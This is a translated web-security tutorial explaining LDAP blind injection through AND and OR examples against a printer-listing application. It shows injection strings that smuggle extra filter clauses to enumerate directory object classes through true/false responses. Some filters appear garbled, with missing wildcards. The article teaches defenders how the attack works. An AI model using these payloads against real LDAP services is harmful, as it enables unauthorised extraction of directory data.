Watch your door-attack data storage (6)-LDAP Blind injection

The first thing to declare is that this article is purely an ignorant view of a little developer without foresight and knowledge, and is intended only for reference in Web system security.

Part of the content comes from the web and translation

1, some superfluous words

Suppose an attacker could infer some information from the server response, although the application did not provide an obvious error message. However, the code in the LDAP filter generates a valid response or error. An attacker could use this behavior to ask the server the correct or wrong question. This attack is called a blind injection attack. Blind injection attacks on LDAP are slow but easy to implement because they are based on binary logic that allows an attacker to extract information from an LDAP directory.

2. LDAP and blind injection attacks

Suppose a Web application wants to list all available Epson printers from an LDAP directory, the error message is not returned, and the app sends the following filter:
(& (Objectclass=printer) (type=epson*))
Using this query, if there is an available Epson printer, its icon will be displayed to the client, otherwise no icon appears. If an attacker makes an LDAP blind injection attack
) (objectclass=)) (& (Objectclass=void
The Web App constructs the following query:
(& (Objectclass=) (objectclass=)) (& (Objectclass=void) (type=epson*))
Only the first LDAP filter will be processed:
(& (Objectclass=) (objectclass=))
As a result, the printer's icon must be displayed to the client, because the query always gets the result: the filter objectclass=* always returns an object. The response is true when the icon is displayed, otherwise false.
From this point of view, it is easier to use blind technology, for example, to construct the following injection:
(& (Objectclass=) (objectclass=users)) (& (Objectclass=foo) (Type=epson))
(& (Objectclass=) (objectclass=resources)) (& (Objectclass=foo) (Type=epson))
This code injection setting allows an attacker to speculate on the values of different object classes that might exist in the LDAP directory service. When the response Web page contains at least one printer icon, the value of the object class is present, on the other hand, if the value of the object class does not exist or does not have access to it, no icon appears.
LDAP Blind technology allows attackers to access all information using True/false-based technology.

3. LDAP or blind injection attacks

In this case, the logic used to speculate on the desired information is the opposite of and, because the or logical operator is used. The next use is the same example, or the injection of the environment is:
(| (objectclass=void) (objectclass=void)) (& (Objectclass=void) (type=epson*))
This LDAP query does not obtain any objects from the LDAP directory service, and the printer's icon is not displayed to the client (FALSE). If there are any icons in the Response Web page, the response is true. The attacker could then inject the following LDAP filters to gather information:
(| (objectclass=void) (objectclass=users)) (& (Objectclass=void) (type=epson*))
(| (objectclass=void) (objectclass=resources)) (& (Objectclass=void) (type=epson*))

Watch your door-attack data storage (6)-LDAP Blind injection